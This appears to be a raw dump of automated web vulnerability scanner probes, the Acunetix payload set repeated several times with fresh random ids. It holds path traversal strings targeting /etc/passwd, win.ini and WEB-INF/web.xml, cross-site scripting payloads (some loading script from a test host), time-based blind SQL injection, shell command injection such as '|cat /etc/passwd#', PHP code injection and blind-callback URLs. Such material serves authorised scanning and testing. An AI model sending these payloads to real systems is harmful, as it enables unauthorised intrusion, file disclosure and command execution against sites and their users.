acu2220\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2220

1

1

1

../../../../../../../../../../windows/win.ini.jpg

"|dir

1

acux8106\xc0\xbez1\xc0\xbcz2a\x90bcxuca8106

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(933713)</ScRiPt>

1

1

1

1

1<script>prompt(950697)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(923075)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915497></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(993963)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(904564)">

1

response.write(9597859*9602880)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(920494)"></g></svg>

1

1

1<div style=width:expression(prompt(945369))>

WEB-INF/web.xml

'+response.write(9597859*9602880)+'

1

&cat /etc/passwd&

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9597859*9602880)+"

WEB-INF\web.xml

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(957278)>

../../../../../../../../../../etc/passwd

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(970730)>

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=xyz OnErRor=prompt(962565)>

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img/src=">" onerror=alert(960388)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${99857+100052}

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

`cat /etc/passwd`

1<ScRiPt%20>prompt(978334)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1&lt

-1)

/../..//../..//../..//../..//../..//etc/passwd.jpg

|cat /etc/passwd#

1

)

1&n968235=v901667

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'|'ld

-1))

\xf6<img acu onmouseover=prompt(907932) //\xf6>

'"()

1

1

testasp.vulnweb.com

!(()&&!|*|*|

1

1

7Vf4Bou5'

1<input autofocus onfocus=prompt(944772)>

"|"ld

/etc/passwd

1

^(#$!@#$)(()))******

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

ZdWNKhUV')

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

1

xh6733QZ'))

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

1

1

"

1

1

-1

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1_7GnLH <ScRiPt >prompt(972451)</ScRiPt>

1

1

1

||cat /etc/passwd

-1)

1

${@print(md5(acunetix_wvs_security_test))}

http://hit9uzoVHweZA.bxss.me/

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

-1))

&dir

1

file:///etc/passwd

1

1

1

1

http://www.acunetix.tst

'"

'&dir&'

xBdCxUeF'

comments

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(908735)</ScRiPt>

1

1

<!--

comments

cXmItavf')

"&dir&"

WEB-INF/web.xml

1

1

'"()&%<ScRiPt >prompt(967067)</ScRiPt>

1

1

comments/.

WEB-INF\web.xml

|dir

u5LjmPuA'))

1

1

1

1_925004

1

1

'|dir

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

"|dir

1

1

acu5442\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5442

1

../../../../../../../../../../windows/win.ini.jpg

1

acux8004\xc0\xbez1\xc0\xbcz2a\x90bcxuca8004

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(936849)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(929099)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(952099)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?934198></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(989876)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(958014)">

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(934898)"></g></svg>

1

WEB-INF/web.xml

1

1<div style=width:expression(prompt(965724))>

1

response.write(9449108*9688911)

WEB-INF\web.xml

1

1

1

'+response.write(9449108*9688911)+'

1<iframe src='data:text/html

1

1

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9449108*9688911)+"

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(998247)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

'&cat /etc/passwd&'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(936734)>

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

1<img src=xyz OnErRor=prompt(940799)>

1

if(now()=sysdate(),sleep(6.374),0)/*'XOR(if(now()=sysdate(),sleep(6.374),0))OR'"XOR(if(now()=sysdate(),sleep(6.374),0))OR"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

cat /etc/passwd

1<img/src=">" onerror=alert(900000)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99998+99604}

if(now()=sysdate(),sleep(3.187),0)/*'XOR(if(now()=sysdate(),sleep(3.187),0))OR'"XOR(if(now()=sysdate(),sleep(3.187),0))OR"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

cat /etc/passwd

1

${99998+99604}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(900000)>

1

if(now()=sysdate(),sleep(9.561),0)/*'XOR(if(now()=sysdate(),sleep(9.561),0))OR'"XOR(if(now()=sysdate(),sleep(9.561),0))OR"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

cat /etc/passwd

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

1

${99998+99604}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(900000)>

1

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt%20>prompt(969636)</sCripT>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

(select(0)from(select(sleep(9.561)))v)/*'+(select(0)from(select(sleep(9.561)))v)+'"+(select(0)from(select(sleep(9.561)))v)+"*/

1

1&n986718=v948154

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

|cat /etc/passwd#

1

-1

1

\xf6<img acu onmouseover=prompt(938272) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

testasp.vulnweb.com

1

1<input autofocus onfocus=prompt(968465)>

-1)

1

'|'ld

1

^(#$!@#$)(()))******

/etc/passwd

'"()

1

"|"ld

1

-1))

<a href='http://www.acunetix.com'>website security</a>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

'

[url=http://www.acunetix.com]website security[/url]

GzQZQeu5'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

'

1

1

1_HaQ3X <ScRiPt >prompt(914132)</ScRiPt>

tA8OnLLp')

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

UkwTMpnb'))

1

1

1

"

http://hitUf9MZY4kAe.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

1

-1

acunetix_wvs_invalid_filename

1

||cat /etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

file:///etc/passwd

1

comments

1

-1)

http://www.acunetix.tst

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

&dir

comments

1

-1))

1

'"

1

1'"()&%<ScRiPt >prompt(937949)</ScRiPt>

1

IhNHicDA'

'&dir&'

comments/.

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(908038)</ScRiPt>

<!--

1

hWYZ9Co7')

1

"&dir&"

1

WEB-INF\web.xml

WvLhDfwu'))

1

1_941874

1

|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

'|dir

1

../../../../../../../../../../boot.ini

1

"|dir

1

acu3372\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3372

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux4481\xc0\xbez1\xc0\xbcz2a\x90bcxuca4481

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(931213)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(914641)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(955648)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?938083></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(925550)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(969565)">

response.write(9484845*9527605)

1

1

1

1

'+response.write(9484845*9527605)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983721)"></g></svg>

1

&cat /etc/passwd&

1

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9484845*9527605)+"

1

1<div style=width:expression(prompt(987401))>

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

"&cat /etc/passwd&"

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

1<body onload=prompt(937229)>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(906592)>

1

1

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

`cat /etc/passwd`

1

-1)

1

1<img src=xyz OnErRor=prompt(938985)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

${99028+99675}

1<img/src=">" onerror=alert(980849)>

-1))

1

|cat /etc/passwd#

1

1&n926939=v993990

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt%20>prompt(943611)</sCripT>

'|'ld

1

)

WHKjMFHH'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1&lt

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

BOIYzRrG')

!(()&&!|*|*|

'"()

1

testasp.vulnweb.com

\xf6<img acu onmouseover=prompt(911494) //\xf6>

/etc/passwd

1

'

xAO74vC5'))

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(906146)>

1

1

1

'

-1

"

1

1

<a href='http://www.acunetix.com'>website security</a>

1

${@print(md5(acunetix_wvs_security_test))}

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1)

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

[url=http://www.acunetix.com]website security[/url]

"

1

1

-1))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

1_UiiTx <ScRiPt >prompt(938990)</ScRiPt>

1

Vg15Q23y'

http://hitBy5WXLQg5H.bxss.me/

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

6jLkbtMv')

1

1

comments

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1

NhiCLIPQ'))

1

http://www.acunetix.tst

1

file:///etc/passwd

"&dir&"

comments

1

1

1

1

'"

comments/.

|dir

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(975656)</ScRiPt>

<!--

1

1

1

1

'"()&%<ScRiPt >prompt(924615)</ScRiPt>

WEB-INF/web.xml

'|dir

1

1

1

1_958865

WEB-INF\web.xml

1

"|dir

1

1

1

1

../../../../../../../../../../windows/win.ini

1

acu10328\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10328

../../../../../../../../../../boot.ini

1

1

1

1

acux7038\xc0\xbez1\xc0\xbcz2a\x90bcxuca7038

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(921712)</ScRiPt>

1

1

1

1<script>prompt(919231)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(998320)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?960984></ScRiPt>

1

1

1

1<ScRiPt >prompt(919772)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(996629)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

response.write(9333500*9382418)

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(912413)"></g></svg>

1

WEB-INF/web.xml

'+response.write(9333500*9382418)+'

1

&cat /etc/passwd&

1

WEB-INF\web.xml

"+response.write(9333500*9382418)+"

1<div style=width:expression(prompt(985495))>

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(966463)>

1

cat /etc/passwd

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959429)>

1

`cat /etc/passwd`

-1

1

${99063+100393}

1<img src=xyz OnErRor=prompt(932683)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img/src=">" onerror=alert(999458)>

1

1&n953123=v981536

|cat /etc/passwd#

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt%20>prompt(938708)</sCripT>

)

1

-1))

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

1&lt

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

g7n3O5b8'

testasp.vulnweb.com

^(#$!@#$)(()))******

'"()

1

\xf6<img acu onmouseover=prompt(944030) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

XaZOX9fv')

/etc/passwd

1

'

1<input autofocus onfocus=prompt(916185)>

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

'

fsaYKApH'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

-1

http://hitKZmvJaifzN.bxss.me/

acunetix_wvs_invalid_filename

1_QgfFS <ScRiPt >prompt(932639)</ScRiPt>

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

&dir

1

-1))

http://www.acunetix.tst

1

file:///etc/passwd

comments

1

1

'&dir&'

TbkBZ7Vz'

'"

1

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

XXK9BbrG')

<!--

1'"()&%<ScRiPt >prompt(909834)</ScRiPt>

"&dir&"

1

WEB-INF/web.xml

1

1

qIdJ7jrf'))

|dir

1

'"()&%<ScRiPt >prompt(992752)</ScRiPt>

1

1

1

1

WEB-INF\web.xml

1_943049

'|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acu8891\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8891

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux3603\xc0\xbez1\xc0\xbcz2a\x90bcxuca3603

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1<ScRiPt >prompt(964668)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(953911)</script>

1

1

1

1<ScRiPt >prompt(943802)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?981766></ScRiPt>

1

1

1

1<ScRiPt >prompt(927302)</ScRiPt>

response.write(9487171*9886101)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

'+response.write(9487171*9886101)+'

1<video><source onerror="javascript:prompt(981763)">

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(907979)"></g></svg>

../../../../../../../../../../etc/passwd

"+response.write(9487171*9886101)+"

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<div style=width:expression(prompt(959490))>

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

1

`cat /etc/passwd`

1

1<body onload=prompt(957204)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

${99985+99806}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(980999)>

1

|cat /etc/passwd#

1

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1&n999634=v900506

1

'|'ld

1

1<img src=xyz OnErRor=prompt(960343)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1)

1some_inexistent_file_with_long_name%00.jpg

)

1

-1))

1

"|"ld

1

1<img/src=">" onerror=alert(993587)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Rs3qAxqA'

/etc/passwd

1<ScRiPt%20>prompt(994541)</sCripT>

1

1

6dkiG9kR')

testasp.vulnweb.com

^(#$!@#$)(()))******

1

'

QoEZZW35'))

1

1&lt

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

1

1

-1

1

\xf6<img acu onmouseover=prompt(985899) //\xf6>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<input autofocus onfocus=prompt(928927)>

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

acunetix_wvs_invalid_filename

1

-1))

1

http://hitw2nIuguWFB.bxss.me/

1

[url=http://www.acunetix.com]website security[/url]

&dir

comments

file:///etc/passwd

1

1

1_tJQGn <ScRiPt >prompt(981614)</ScRiPt>

1

1

ANhayw2G'

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

1

http://www.acunetix.tst

1

comments/.

1

1

eZupge5t')

1

1

WEB-INF/web.xml

1

"&dir&"

'"

1

Z9SSDCqr'))

1'"()&%<ScRiPt >prompt(972404)</ScRiPt>

1

1

1

1

|dir

<!--

WEB-INF\web.xml

1

1

1

'"()&%<ScRiPt >prompt(918087)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini

'|dir

1

1_919442

1

1

1

"|dir

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acu8923\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8923

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

acux4385\xc0\xbez1\xc0\xbcz2a\x90bcxuca4385

1

1

1

1

1<ScRiPt >prompt(986406)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(979685)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(925895)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?987631></ScRiPt>

1

1

1<ScRiPt >prompt(985948)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<video><source onerror="javascript:prompt(925750)">

response.write(9422753*9999206)

1

1

'+response.write(9422753*9999206)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(985944)"></g></svg>

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

"+response.write(9422753*9999206)+"

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<div style=width:expression(prompt(913350))>

1

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<iframe src='data:text/html

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<body onload=prompt(960164)>

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(991141)>

-1

1

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99280+99987}

-1)

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=xyz OnErRor=prompt(911036)>

1

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1<img/src=">" onerror=alert(970068)>

1&n998899=v969406

1

1some_inexistent_file_with_long_name%00.jpg

1

GqLwPyqQ'

"|"ld

)

1

1<ScRiPt%20>prompt(929892)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

SZ0W1k8K')

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Tkmt0sTu'))

'"()

1&lt

'

^(#$!@#$)(()))******

-1

testasp.vulnweb.com

1

1

1

/etc/passwd

'

"

1

\xf6<img acu onmouseover=prompt(921705) //\xf6>

